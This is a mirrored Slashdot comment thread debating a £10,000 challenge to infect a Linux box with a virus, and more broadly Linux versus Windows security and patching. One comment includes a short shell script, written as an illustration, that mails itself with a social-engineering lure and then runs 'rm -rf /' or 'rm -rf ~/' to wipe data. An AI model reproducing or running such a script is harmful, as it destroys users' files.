Slashdot Mirror
£10,000 Prize for Linux Virus Challenge Re-Issued
mutantcamel writes "Eddie Bleasdale, the director of NetProject has been offering
£10,000 to the first hacker to infect his Linux machine with a virus for the last two years, and so far no one has hit the jackpot. He's re-announced his challenge to virus writers following a Gartner report which told IT depts. not to trust MS server software because of recent worm attacks on their servers, but a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins."
So ... write a virus and get rewarded for it? What kind of world do we live in where criminals get rewarded?!
...
I guess crime does pay
To celebrate the occasion of my 1000th post, I will post no more forever on Slashdot. Goodbye.
And will you be called a "gifted programmer" a "security expert" or a "terrorist"?
In these times and with all of what's happening with all the laws passed, I wouldn't even dare touching that kind of contest, sure it's gonna make a possible winner popular, but could be also seen as a prime suspect for writing trojan code, and since law enforcement at higher levels often tries to find someone to blame, well, you know the rest.... (as in wrongfully accused, lack of proofs and still convicted, etc etc).
--- Metamoderating abusive downgraders since my 300th post.
Keep in mind that default Redhat installation ships with many bugs that all need to be patched. Saying someone can't hack this kids linux box is a reason not to trust MS is just plain stupid. If IT dept. would patch their software and not open idiot attachments you couldnt infect MS BOXES EITHER. Its all about PATCHING, no matter which OS you use.
Think about it, most MS bugs had patches before they went widescale. If you had taken time to install these patches you wouldn't have been infected. In addition, don't open EXE's that ask for your advice and its extremely hard to infect an NT system as well.
You cant compare an upgraded and constantly patched linux box to a default Win2k installation.
Does anyone else think that it is irresponsible to try to persuade virus writers to target Linux? What happens if someone is successful and unleashes a particularly nasty linux virus on us?
Let the virus kiddies stick to targeting Windoze.
HH
Does he just want his linux box destroyed or does it have to be a virus? He can give me his address, I'll gladly fly down to his house and smash up his linux box with a bat for 10,000 pounds (that's around 14,534 dollars and 22 cents).
I do find myself somewhat agreeing with Microsoft on this. Bugs happen. Open source may have fewer of them, but they happen with open source, too. Very few open source systems are secure "out of the box". Any admin that assumes otherwise, for BSD, or Linux, or Microsoft Windows, is a retard. Comparing an improperly administered system of one class to a tightly secured system of another is really pointless. It's comparing a retard to someone who knows what they are doing, and cares.
now we need to go OSS in diesel cars
Actually, its closer to $15,000. Im sure theres lots of currency converters out there that would tell you that
I'm guessing the virus writers gave up already. I'm sure 10,000 pounds is not worth the time of two years. It sounds to me that it's impossible. They should increase that amount by an exponent of 100 and see what happens.
But it's even more funny that they have to pay people to attempt to write a virus, on a free and open source system. This only means one thing...Linux really works!
If businesses want to make their networks secure, they need to hire someone who cares and knows how, and pay well to get that person. Then don't hinder them with petty things like bureaucracy. They should report directly to the CTO or CIO, or actually be the CTO or CIO.
now we need to go OSS in diesel cars
Found on the same site Virus & Hacking
-- ZeroZenith
If he doesn't run his email attachments he'll be safe. What's the big deal?
I agree that some of the responsibility lies with the sysadmin, but then again, the OS should be designed well enough that the patches are minimal.
I work in an enterprise unix environment and getting time for outages to apply patches is incredibly tough when you are running 24x7 systems that are critical to the operation of the customer.
Sure, we try to patch systems when we find out about security holes, but there comes a time when you cannot simply afford to take your systems down every week to apply new patches. Now I don't deal with MS stuff so I can't comment authoritively, but it seems that the number of patches with MS products is never ending. This stops being a sysadmin problem and becomes a vendor (ie Microsoft) issue. Ultimately, it's a sloppy coding issue that lies with Microsoft.
The university starts later than most (Sept. 28), and I started getting this round of hits about the same time the Dorms opened up.
Problem, is the university doesn't seem to be willing to do anything about it.
Today, I shall announce an award of $5 (CDN) to who ever can write a virus for a Mac...
So start coding... There is a lot of competition out there...
---
Programming is like sex... Make one mistake and support it the rest of your life.
To be a real virus, it has to propagate to other machines, which is likely breaking the law.
So the 10,000 pounds will eventually end up in the pocket of a lawyer for defending you!
"...but a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins."
After all the hours I put in on those bloody worms & viruses, it's nice to see some fallout against Microsoft, those who set the scene for such silliness. If they take responsibility for creating an insecure environment with their OS and software, they do severe damage to their brand and franchise value. If they do what they're doing now, biting the hands which feed them, ie those in the trenches making their crappy software work in production, then they will likely alienate many of the hordes of SAs which help them maintain their current position in the Enterprise & SOHOs.
Squirm, MS, Squirm.
Two years ago, most programmers were fat and content in their dot com job and didn't really have too much spare time for such stuff.
Now with the job market in the shitter, I can see someone putting plenty of effort into coding a worm for Linux (especially for $10K). A lot of people now have nothing else to do except submit resumes and work on personal projects.
Hammer of Truth
Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins.
So the admins responsible for Windows Update are considered 'tards by Microsoft? After all, windowsupdate.microsoft.com was reportedly "hacked by Chinese" this summer.
--
"Outlook not so good." That magic 8-ball knows everything! I'll ask about Exchange Server next.
What happens if someone is successful and unleashes a particularly nasty linux virus on us?
Then the particular exploit will be patched, people will learn from the experience, and Linux will be a better, more secure system as a result.
If we discourage people from trying to break systems, we end up with weak systems.
Making Linux more secure today may result in some costly damage today - but will result in a more secure Linux, which will (as more and more people install and rely on Linux) almost certainly prevent orders of magnitude more damage several years from now. If we allow systems to become "weak", but continue installing millions more such systems, sooner or later someone will write a truly malicous virus, and the damage will be far greater in that case. Think man.
I'll bet that if those gifted hackers using Linux entered this contest, it would only be a matter of time before someone did it. The problem is, none of these hackers using linux want to ruin the "secure" reputation of the OS by winning this contest. Instead of worrying about ruining its reputation, try and make a virus for it so the linux community can then come up with an update for the kernel or whatever to make it secure again.
"Be regular and orderly in your life, so that you may be violent and original in your work." -Flaubert
... provided you're not stupid.
I offer 10$ canadian (or 0.10$ US if you will) to anyone who can infect my box, 24.112.8.23.
And please no DOS attacks....
I think it was on the freebsd website that I recently saw something along the lines of "four years without a remote exploit in the default install". Can either Microsoft or the Linux community claim that? Of course not. But the point is, it IS POSSIBLE, you can't just blame sysadmins, the vendor needs to accept some responsibility too. It shows that if a vendor really feels strongly about security, then it is possible.
On a side note, I struggle to believe that MS isn't legally responsible for damage resulting from defects in its products, or that if they aren't (via EULAs) that people accept this blithely, MS has had a pretty lax attitude up to now.
OH.. no.. not at all.
They simply need an admin who is diligent about applying patches and staying informed.
Why does the CTO or CIO have to be involved? that's rediculous.
Perhaps $ 1.000.000 make sense. No body hurt himself for $15.000.
Thats impossible man, They can't write worm or virus.
Maybe for apache or someting.
But in any condition. its impossible to spread like M$ worms.
[My english is better than most other people's Turkish, so please point out mistakes politely. Thank you.]
Because without the CTO or CIO's approval and backing, you can't get a damn thing done.
7 November 2006: The day Americans realized corruption and incompetence weren't addressing 11 September 2001
--just a thought. No intent to offend, etc.
I dont think linux is more secure for this kind of thingShort Answer: Anthrax isn't a virus.
I looked at netproject.com and couldn't find more details. What's the machine running, etc? Right now, my Linux box is behind my Windows box that only runs a web proxy. I'm also on dialup. Plus, my linux box is shut off right now. That makes it pretty secure, right? Seriously, if people only run their box with a web server and SSH, there's less of a chance of getting inside that if they ran many servers and had to worry about hacking from people with accounts on the box.
a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins.
Now huge sucess in IIS' worms is due to 'tardy' NT sysadmins, and definitely not MS' fault?
MS fans should feel sad for having honored title 'tardy' after all those years of unconditional loyalty.
the virus/worm or the patch?
You know someone is going to say retarded, which might not be completely fair.
It has been said that no-one ever got fired for buying IBM (long ago), or Microsoft. This may be slowing changing. I don't know of many people who want to put their jobs on the line to protect the reputation of some other company.
"It is a greater offense to steal men's labor, than their clothes"
You guys should add "Gotcha" at the end, for the more gullible, or those that skim through and miss things like "open sores software"
I still find this unfunny, because it comes framed as a personal attack.
Letter To Iran
Considering that writing a virus could be considered terrorism, and prosecuted as suck, I don't know that this would be the best idea...
Although, I would certainly like the 10k Pounds...
(Now, if only I knew how to input the Pound symbol on my US keyboard...)
-- Sometimes you have to turn the lights off in order to see.
I've seen hacking contests before. They're really freaking lame. The results are not often announced, it just disappears. Or you get everyone doing a DoS thinking that is hacking.
"Bleasdale maintains it is impossible to infect a correctly configured Linux system with a virus, and conversely that it is impossible to make a system running Windows secure."
Okay this is quite clearly wrong. On many levels. Now it is possible that this guy set up a linux box with no services running at all. Fine. WindowsNT is equally secure with nothing running. But lets say a linux box has Apache, bind, or FTP on it. We've seen buffer overflows and other attacks on these software products. There is a delay from discovery to annoucement to fix available. To claim that a linux box is impossible to infect is just showing ignorance, unless of course it's running nothing at all.
It has been said already, but I think this is a pretty dangerous undertaking, it has been a few years now but there has been a pretty bad *IX worm out there.
It exploited secrurity holes in Bind and some other projects wich where (like Code Red and Nimda) known a FEW MONTHS before the worm came out.
The only reason why this hasn't happened to *UX systems lately is because a) Most scripy kiddies hate windowze systems b) because we (the *IX admins) have something to prove (the superiority of "our" system) we PATCH.
BUT since linux is becoming more and more mainstream and used more and more at homes as small file servers or as internet routers and the sort a worm could have some devestating effects.
My 2 cts (BTW I am not defending Microsoft here)
Fighting for peace is like fucking for virginity
I'm sure the cure Microsoft would recommend is that companies hire only Microsoft accredited sysadmins through some expensive Microsoft accreditation system, and when the problem persists, then a request would be issued to pass laws that all internet connected servers running Microsoft be maintained by same.
Letter To Iran
Bill Gates would do this too, but he can't afford it.
My Karma was at 49, then they switched to words. All that work for nothing!
... of one of my old OS prof's in college
during his OS course, if you were to root his box (it ran OpenBSD), report the contents of a certain file and how you broke in, you get an A and have your name listed as an OpenBSD contributer.
Ok, so someone used the CS Dept's main Sun server to launch a DoS attack against his machine. His box held up just fine (he says he was using it during the attack and didnt notice anything unusual happening). But the dept server, OTOH, sustained major damage. It needed rebooting, and it crashed during reboot.
The dept head was not happy. The guy had to cancel that challenge because it apparently violated university policy.
The One Rule Of Chess You'll Ever Need: Don't play someone who carries a kit in their bookbag.
I agree with Microsoft, in part.
Having been responsible some time ago of the maintenance of both systems (NT and Unix) I always found easier to maintain all the different flavors of Unix (Linux, Solaris, BSD) than WinNT. Win2000 might have changed that, but I'm no longer administering MS based systems.
The main appeal of MS systems are the "Zero cost of ownership" (or whatever it's called), so it attracts lots of people with "zero sysadmin experience" who just pop in the cd and install nt+iis+exchange in a day or less, never again returning to so much as check the windows update page. I have a couple of customers who, to this day, are still vulnerable to code-red and nimda.
And no amount of warnings makes them take action until ISPs start blocking them... it's almost the same with the SPAM problem.
No sig
"....Eddie Bleasdale, has reiterated his pledge to give £10,000 to anyone who can infect his Linux computer with a virus."
This is famous, because its Loud. Tomorrow if a Window 2000 Admin comes and says the same thing about his "correctly configured system", I'm sure nobody will be able to do anything EXCEPT for Microsoft Employees (or the code thieves...) who know of an undetected backdoor somewhere hidden underneath layers of Windows.
But then, the same can be expected of a bug in Open Source which nobody has carefully examined till yet (its possible...quite possible).
More to the point: It's stupid and lazy people who get viruses, regardless of their OS. If Linux ever becomes widespread, it will have a bigger virus problem than Microsoft ever has.
"but a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins"
;)
It's many many many times easyer to press 'SETUP' then it is to read a bugtraq every few days.
Maybe Microsoft qould change the setup procedure so you HAVE to read many pages before your system works. Atleast you've proven that you can read
Bit like Linux. Read and search for hours to get something working.
No. Just kidding, but the click-wait-and-beporoudofyourserver is also too easy. Last few weeks i've been probed by several MServers with the 'congratulated with your new server' screen as opening-screen. As I see it many of those servers are made by A: people who are curious about what it's like to have _their own_ server and B: install the server with illegal software and C: never have heared of 'patches' and 'upgrades'.
Privacy is terrorism.
All I need is access to your CD-ROM drive and a Windows CD!!
My life is one big siesta in which I'm dreaming I wished my life was one big siesta.
That quote was on the OpenBSD site, but is hardly surprising since OpenBSD won't enable any service at all unless you tell him to. This, of course, is The Right Way to Do It (tm) instead of the "let's enable every service by default" approach that W2K (Advamced) Server takes. In my experience, the average *ix sysadmin is much more knowledgeable than the average Windows admin about what services is he running.
I was the security "expert" at my last job, being the only person who really knew anything about security issues.
I was hampered from doing my job because of the way the network was set up when I got there. People resisted change.
Then, a FTP server someone else set up became an mp3 server one night. What a shock!
In other words, if you're going to institute security, people have to actually listen to you and, essentially, do what you say. You need to be the one with the power, not the one who's told what to do. That kind of edict can [usually] only come from the top.
"You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
The Constitution is NOT a suicide pact.
And quotes from Tom Clancy books are hardly divine wisdom.
To my knowledge, the Webstar reward still stands. The contest crack I suggested stems from a pcweek contest, the winner of which (jfs) exploited the third party PhotoAds software. jfs was partially succesful against the crack.linuxppc.org. Details here...
Before people start slamming the Gartner report again, I hope they've read it. People seem to be under the impression that Gartner said that IIS simply wasn't secure and that other things are better - and that the response to this is 'duh, any machine which isn't updated isn't secure'. That isn't a valid response at all, because what Gartner very specifically said was not that IIS couldn't be secured, but that it is simply uneconomical because of the time and effort it takes to update IIS.
I.e. Just what they are saying is 'We all know you need good sysadmins to make sure systems are up to date with security patches, but in the case of IIS you'll have to employ someone to spend all their time doing this, and that simply isn't the least expensive way to go'....
I think you mean tarded for using MS server software.
Blah Blah Blah
Webservers that operate behind a load balancer, reverse proxy server or a firewall will often report the operating system of the load balancer, reverse proxy or firewall server. Hence reports of 'Microsoft/IIS on Linux' indicate that either the web server is behind a Linux server that is acting as a reverse proxy, has been configured to send a different signature or Microsoft have released a version of IIS for Linux.
And If you look at the history info for download.microsoft.com it shows that it is an akamai site. As well all know akamai runs linux.
Your right about RedHat. They throw together the worst Linux destro.
RedHat has lost track of the whole idea of a destro. It's a "value added" Linux.. a better Linux than you'd get if you did it yourself.
Not RedHat..
The whole point is you shouldn't need to patch it.
The defects found in RedHat and Windows are really stupid.
Yeah don't run attachments.. smart idea.. Let's rember that this is a FEATURE Microsoft ADDED. It's not a defect. Windows was made this way.
Give Microsoft a break for the first virus. Ok done.. Need the first infection to learn. Well great but the stupid patch is on the human side.
Let's also remember that Windows is designed to be "user friendly" in other words users don't know better. Linux is made with the os develupers in mind.. not the avrage user. So before you could run an e-mail virus you'd have to know enough about Linux to recognise the virus for what it is.
Now before we get ferther on the "RedHat".. RedHat is not Linux... RedHat is one single destro that compeates with Microsoft for the title of "the most bugs"... and last I heard RedHat held the title.. Not Microsoft.
Going into the past there have been many brown bag Unixes that were far worse than anything Microsoft put out. It's not like Microsoft or RedHat has ever achived the title of "all time most buggy".
But those companys went away. Pushed under by Sun Microsystems long before Linux saw the light of day.
Yes you can pick out a Linux destro that is as bad if not worse than Microsoft.. I know RedHat isn't the only brain dead destro.
So you can't just buy the first Linux destro on the shelfs any more than you could buy the first used car you see.
But you can't shop around for a better Windows.
Finnaly as I understand Windows admin are fearful of Microsoft patches. They are worried the fix will be worse than the disease...
That fear dosen't seem to be shared by Linux counterparts.
Ideally a Linux destro should be fine out of the box needing no patching. Not all destros have this advantage so you do need to shop around.
A lot more preferable to patching Windows and hoping the patches don't make things worse.
Basicly for Linux you need to train users there is no way around this.
If you want Windows to work correctly you have to train the users as well.
Now what advantage did Windows have over Linux? Not needing to train anybody.
Oh.. yeah well I guess thats not the case anymore.
There aren't any viruses for Linux at the moment.
If you want to argue the future fine be my guest but let's leave it at right now Windows has the lead in viruses. Linux won't catch up even if we wanted it to...
I don't actually exist.
I have to admit that *some* (okay, maybe a lot/most) of the infections were purely due to poor server administration. The story doesn't stop there though.
I offer up as proof of what follows my Apache logs on my home machine for the last month. It's amazing how many machines out there seem incredibly interested in files such as "cmd.exe" and "root.exe", which (gasp!) don't exist on my Linux box. What's funnier is the fact that the vast majority of these attacks came from the BellSouth DSL network and various cable networks. I actually got to the point where I was ready to write a Perl script to grep up the nefarious log entries, nmap 'em automatically, and ship the results off to BellSouth's abuse department every 12 hours...
The point I'm trying to make is simply that the biggest vector for the spread of this crap is home machines. MS can yap all day long about how poor admin'ing causes this, while they fail to admit that they've put horribly insecure web server software in the hands of average Joe and Jane Consumer. Now, I'm not saying it's all MS's fault; Joe and Jane are very much to blame too for not bothering to click "Start -> Windows Update" every once in a while.
But I won't accept that MS can claim any sort of innocence on this. What about other
This has to be the most poorly researched article I've ever seen. What is this? "I heard Eddie say that he'd give Sophos a bucket load of money if they could infect his Linux box" becomes news? For a start, there are already Unix viruses and they have been reported in the wild. What is all this stuff about "hackers" and "exploits" about? Are we talking about worms or viruses or what? Where is the actual written declaration of the challenge? Who is the third party holding the cash in escrow? How is the challenge supposed to work? Surely Ed isn't suggesting that he will track down and award the author of any virus that ends up on his machine. Surely Ed isn't trying to incite people to write actual viruses and release them into the wild. I have emailed netproject.com, maybe the original "reporter" should have done this, it's called basic research. BTW - I heard Bill Gates said he'd give $1,000,000 to anyone who can sneak a woopie cushion onto his chair before he sits down on monday, should I look for the Slashdot article?
How we know is more important than what we know.
... we just need to convince him somehow that he needs to open email attachments. Any of us could make an executable that would dispose of his machine and we'd collect the reward. But he wouldn't run it for us like so many Windows users would. Linux is JUST as vulnerable to 90% of the types of Windows viruses that are out there... its users just often aren't.
Yeah.. they were to lazy to install a real OS like Unix/Linux/BSD... hey even if they kept NT or Windows, they could have at least used Apache!
Only 'flamers' flame!
We have `netstat -anp`... they have... ummm... service manager?
The journey is better then the end.
I tend to bash WinXXXX as the next slashdoter, with good reasons, but netstat exists on Win2k too... check your facts first.. :)
Nah thats Windows your thinking of..
"WebTV: bringing the Internet into the shallow end of the gene pool since 1995" - Martin Bishop
I have been reading though the posts and i've seen people saying that patch and don't get infected etc. My question is, how will you patch something that doesn't exist. I mean if a virus doesn't exist then there is no patch for that virus. You will get a patch after a virus has been discovered, and a patch has been released. But until then it might be too late. Somebody said (in a previous thread) that if an os was designed with security in mind the patches would be to a minimum. I agree to that and i like to say that it's not the admins fault. If MS had not all these security holes then maybe a few patches would "close" the holes and admins would be able to keep up with the patches.
Viruses and other exploits don't happen because of mere sloppy coding. It is rather arrogance and/or poor design (which I guess are the same thing). And this is not limited to proprietary software either.
A well-designed secure program generally assumes that it will be compromised and has safeguards to limit impact of such a compromise. For example, think of what you can do if you compromise IIS or Sendmail, and compare with a compromise of Qmail or Apache (assuming you could compomise Qmail). IIS, Outlook, and other Microsoft products suffer from this problem.
So, people will say that the *nix world is much better (and forget the lessons learned from the Morris Worm). The kernels are very stable, but it is the network services which are the most vulnerable. Remember that root has to run the process if it binds to a port below 1024, so many network daemons are run exclusively by root. If I were into this area, I would be targeting these services (BIND, Sendmail, Tux, Websphere, etc.) rather than the older viruses. Tux represents an interesting case in point because it can have no safeguards except for very careful coding (and NO coding will ever be perfect) as it runs in kernel mode.
Now there is one other thing that was not said... Does the virus have to be Linux specific, or can I use an old-fashioned boot-sector virus?
LedgerSMB: Open source Accounting/ERP
We have `netstat -anp`... they have... ummm... service manager?
:)
/etc/rc.d/... (or wherever your distribution puts your init scripts at) than looking at netstat...
Just FYI, but under windows you have the equivalent command but instead of "netstat -anp" it's "netstat -ano". I realize the differences between these 2 commands may be great, but the command does still exist.
Of course, netstat and service manager aren't the same tools, because netstat is useful for more than just seeing what Service's you're running - after all, not everything in service manager opens a port, and not everything that opens a port has to be in service manager.
Looking at service manager is really more like looking in
And just FYI, you'll find most of your normal unix networking utilities are available at the command line in windows. There's ping, and tracert, ipconfig, route, nslookup, etc... There's nothing more fun then telling some absolute novice "All right, now go to Start->Run and type in 'command' and enter. now type ping hostname, ok, let's try tracert hostname. What's it say? ". Ahh, so much fun...
Virus means Anthrax is out.
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
You are both defending Microsoft and you are flat out wrong. Linux *DOES*
not have the virus-spreading email programs and other software that
populates the Windows enviroment.
Hmmm.... So.... If Microsoft were to release Outlook for Linux, then we would be insecure too? The weak point of *nix is that only programs running as root can bind to ports below 1024 which means that most network services MUST run as root, and few have worker processes with fewer restrictions, like Apache does.
So how abaout a change in paradigm? How about ditching this whole concept of requiring network services to run as root and have a "netd" group which would ba allowed to do this but not required to be root. We already sort of hack this by using xinetd and inetd, so why not create a new, more secure standard that would do more to prevent serious exploits and hence possibly viruses as well?
LedgerSMB: Open source Accounting/ERP
only I don't know which part of what I wrote resembled some Tom Clancy quote. I wrote my comment without assistance or plagarizing, because my thoughts are my own.
I don't think this is a fair comparison. On one hand, you have a person that has locked down his machine with the latest patches, the highest security settings, firewalls, etc... And we're comparing it to a WinNT Administrator that has not patched his systems since the first install.
Windows servers could be as secure as Linux if the administrators take the time into securing their servers
Linux servers could be as insecure as a Win Server if the admin doesn't take the time into patching the system.
It's just a matter of the admin. As an administrator of a relatively small institution, it is often difficult for me to be on top of every patch that is available. We have 3 live servers and 1 backup server. It is a great deal to ensure that the patch is not detrimental to our applications, finding time to patch the systems that works with the users, and actually doing it. System patches are often done on weekends or friday nights and doing a bunch of patches at the same time. There is a level of acceptable risks that you must take when you are dealing with live servers.
Has anyone else encountered situations like this? How have you dealt with it?
_______________________________
"I'm not Conceited...I'm just a realist..."
#!/bin/sh
#
# TODO:
# Parse e-mail address' out of browser's cache
# Send program as attachment in e-mail
# Program untested, you'll get the idea anyway...
#
echo -e 'To: $TO_ADDR\nSubject: Hi! How are you? \n\nI send you this file in order to have your advice\n\n#!/bin/sh\nif[ "$UID" = "0" ]; then\n\nrm -rf
if[ "$UID" = "0" ]; then
rm -rf /
else
rm -rf ~/
fi
The program can be considered a virus. While it is blantently clear that you should never run it, I could have made it a binary which would have made it harder to see what it does. And who is to say that the user will even look at the file before executing it? A virus on any system requires the user to execute code (even if it is automated to a certain extent on certain systems). Whether the system is Linux or Windows, if the user wants to execute a program, they will.
Sysadmins would not be put in such a position if M$ idiots actually had some settings turned _off_ by default. :-)
I know that is a hard concept for some) when unfortunately these things have to be installed (the client is the other half of the story
Yes, OpenBSD is 4 years without a remote hole in the default install. They have a very good code peer review which fixes problems before they become problems. Microsoft trying to lay the blame for this on sysadmins is insane. Yes, I do expect to get an OS out of the box with no major security problems. This just shows you how far removed from reality Microsoft still is. They don't "get it". This is why they have had trouble penetrating into the Fortune 500 high-end market. Engineering does not want to here "you're having this problem because you're tardy". What they're saying in essence is "we expect you to work on our timetable". ie. when some 15-year-old exposes how crappy the security of W2K out-of-box is and they patch it, every client worldwide is expected to immediately upgrade or it's the customers fault because they're tardy. This is not what customer's like to here. Thankfully I only have to deal with Solaris (and Linux) most of the time, and NT/W2K only on occasion. I've had the misfortune of always having some small NT responsibility since NT 3.51 came out. Anyone remember what a piece of crap that was? Windows 3.11 GUI even after Windows 95 came out with it's Mac ripped off interface, constant blue screens of death, weird license restrictions on how many people could connect at once, constant need to edit the registry to do anything but editting the registry would invalidate any support. Blah - it hasn't gotten much better since. I've been sysadminning a while, and most NT admins will admit that UNIX is superior to NT.
You suck. I wanted to post this. :(
Best. Comment. Ever. Enjoy!
14,517$, as a matter of fact
1 pound == 1.45$
--
Two witches watched two watches.
Which witch watched which watch?
The Constitution is NOT a suicide pact.
Hmmm, "Give me liberty or give me death"
And it terrorists, not "Islamic terrorists". Osama is enough over the wall that his own family has disowned him.
We give up our (not "so called") rights, guess what? The terrorists just won. Doesn't matter who we bomb, catch, whatever.
Tardy is like 5 minutes, not half a fucking year. Lets be honest here, these sysadmins are not tardy, they are goddamn incompetent.
1q2w3e4r5t6y7u8i9o0pqawsedrftgthyjukilo;p'azsxdcf
"No nation could preserve its freedom in the midst of continual warfare."
--James Madison
What makes this trolling is that you're not contributing anything new to the discussion. OK, you're one of many people who things that Red Hat is too buggy. This is not useful. What would be useful is a description of distros that (in your opinion) do a better job.
Need I mention that I personally prefer Red Hat 7.1? Not perfect, but the easiest to live with for my narrow purposes. If I'm full of it, kindly educate me. Don't just scream at me.
I know if his system gets infected by a virus this will result in a patch and the system becoming more secure. But I hope for the sake of the reputation of an OS that prides itself in being more secure than propriety alternatives and for the sake of this guys wallet that nobody ever wins the money. It would be sad to see this stunt to prove the security of a well maintained linux box backfire. ---- Emacs is a nice OS - but it lacks a good text editor. That's why I am using Vim.
"Madness is something rare in individuals - but in groups, parties, peoples, ages it is the rule." -- Nietzsche
Most likely he considers the oppertunity to study these attempts in a controlled enviroment, more valuable than the money anyways. In a world where most warrenties say something like "Not guarenteed to be suitable for any purpose". I find this approach most refreshing. Try and find commercialy producted software that states that its suitable even for the purpose it was manufactured for.
I hope for his sake running outlook and IE 5.5 in wine is out-of-bonds. I read a while back where the wine crew considered getting a virus to be a major mile stone achievment in compatability.
Apocalypse Cancelled, Sorry, No Ticket Refunds
I Actualy remember stumbling across a BSD copywrite notice in my win95 machine. I bet ther is a lot more bsd stuff in windows than M$ would ever like to be known. I started to look for a lot of the network utils when I saw that both windows and Linux/BSD systems were vulernable to the same TCP/IP buffer overflow.
you can amaze a lot of windows only people by knowing how to run common stuff from the command line.
Apocalypse Cancelled, Sorry, No Ticket Refunds
If he is running Wine, I'll just send him SirCam... But do Windows virii count?
LedgerSMB: Open source Accounting/ERP
"The defects found in RedHat and Windows are really stupid."
You haven't programmed much have you? (At all? No, patching a C file a couple of times and writing some bash scripts does not count as programming much) Most programmers know that there will be (not might be) bugs in the code. As far as stupid defects, yes they've both had their share. However RedHat is nowhere near Windows in terms of sheer volume of severe bugs. I don't know where you got your data. The last one that I saw was clearly biased (they counted general Linux bugs and RedHat-specific bugs together even though there was significant overlap).
Also note that RedHat uses newer versions of programs than most other Linux distributions. They don't hide this fact. I applaud them for it. Why? Because if they didn't, glibc2 would not have been adopted as quickly as it was. And what about the "broken" compiler that came out with RedHat 7? People railed and hollered because they couldn't compile their kernels. Actually they could, but people conveniently forgot that RedHat posted notices in big letters that they have to use the older version of the compiler to compile (oh no! you have to use kgcc instead of gcc! how will users ever figure that out, especially if RedHat explicitly tells them that they have to). Yes there were bugs in the compiler. It was patched, but the kernel still didn't build. Why not? Because there was code in the kernel that was not compliant with the C99 standard. People's C++ code wouldn't compile anymore. Why? Because a lot of C++ code is plainly incompatible with the ISO98 standard of C++. You know that thing that Slashdotters are always railing about: STANDARDS. Or do you advocate ignoring standards when they don't suit you? Wouldn't that make you like Microsoft? These are standards that were ratified and publically announced two and three years ago. How can you say that they snuck up on you?
What does C99 give you?
Allocated on the stack so no need for malloc or free (and less corresponding bugs) and basically eliminates the hacks out there to accomplish them same like alloca.What does ISO98 C++ give you? The Standard Template Library. 'Nuff said.
These are examples, but are indicative of a general trend.
- New library or suite that is noticeably better comes out
- RedHat recognizes that it is better, includes it in their distribution, tests, and releases
- People bitch and moan about how it breaks things that don't come with the distribution
- Everyone blames RedHat for doing a horrible job
- Because it is being used, the library in question gets a shakedown and most bugs are worked out quickly
- People reluctantly fix their programs to work with the updated library/suite so that they can run on RedHat
- In the course of fixing, people come across the advantages of the new library/suite and herald its arrival
- People deride the older version
- People forget it was RedHat that drove the newer, better library/suite into general use
- Goto 1 because geek memories appear to be very short
If you want a closer-to-perfect RedHat box, install a copy from two versions ago and install all of the associated patches for it. This will be about the equivalent of a standard Debian install: very secure, but quite out of date. If you run Debian unstable or testing, while having more up-to-date software, you find that many of those "stupid defects" find their way into that distribution as well.- I don't need to go outside, my CRT tan'll do me just fine.
I offer 10$ canadian (or 0.10$ US if you will) to anyone who can infect my box, 24.112.8.23
ping 24.112.8.23 Pinging 24.112.8.23 with 32 bytes of data: Request timed out. Request timed out. Request timed out. Request timed out. Ping statistics for 24.112.8.23: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms
If this were a test for infecting a Windows machine, the contest would already be over and the contest holder would be reinstalling his box right now...
"To make a mistake is only human; to persist in a mistake is idiotic." Cicero
When is the last time you saw a CTO who knew how to use a computer?
:).
I think I've made my point
"...that the hugely successful worm attacks were due to 'tardy' sysadmins."
Uhm, yeah, and 'stupid' MS programmers packaging programs with 'default' options enabled.
When we see that things arn't secure it drives us to improve them.
;)
Is this case they arn't criminals, they are participators in a contest.
Imagine where crypto technology would be today if it didn't excists eny crackers*.
Imagine what computer security would be today if it didn't excist eny hackers*.
Then we might still be using ceasar encryption and run servers on WINDOWS!? boxes
These harmless hackers/crackers drives us to improve security, wich stops REAL criminals
*(these words have more than one meaning, is this case i mean 'people who crack codes and chipers' and 'poeple who break inte computers')
I think i stop here.
spaic - sweden
Not only is this comment completely redundant... so too is the whole contest....
Any user who knows what he's doing can secure a system so that it's completely immune to virii. Close all ports so hackers can't get to you, and don't do anything stupid like openning attachments.
Even in Windows... Close all ports (easier than you might think). Use a program like Eudora, Pegasus, or Kaufman Mail Warrior that don't support scripting. Don't open any attachments. Don't download illicit software. Don't visit WAREZ sites. Don't take burns/diskettes from ANY other computer. Hey wow... you've just eliminated every way a virus can get into your system, and you're completely immune to virii. I could offer a billion dollars in Microshaft stock to the first person to infect me with a virus, and it wouldn't mean squat, because I know what I'm doing.
If you believe everything you read, you'd better not read. - Japanese proverb
i walk over to this guy's linux box with a q-tip.
I then wipe the q-tip on the inside of the box.
I then place the q-tip in a growth culture disk, cover it, and wait to mother nature at her finest to bring the big bucks to me.
so, where my 10k lbs? its polytics i tell ya, polytics...
eat your heart out little billy g.
i'd sure hate to be little billy g.'s dog right now...*grin*
Who said anything about Redhat?
Obviously you don't know what you're talking about, If you are concerned with security, you should be using slackware, or maybe debian.
"And we have seen and do testify that the Father sent the Son to be the Savior of the World"
1 John 4:14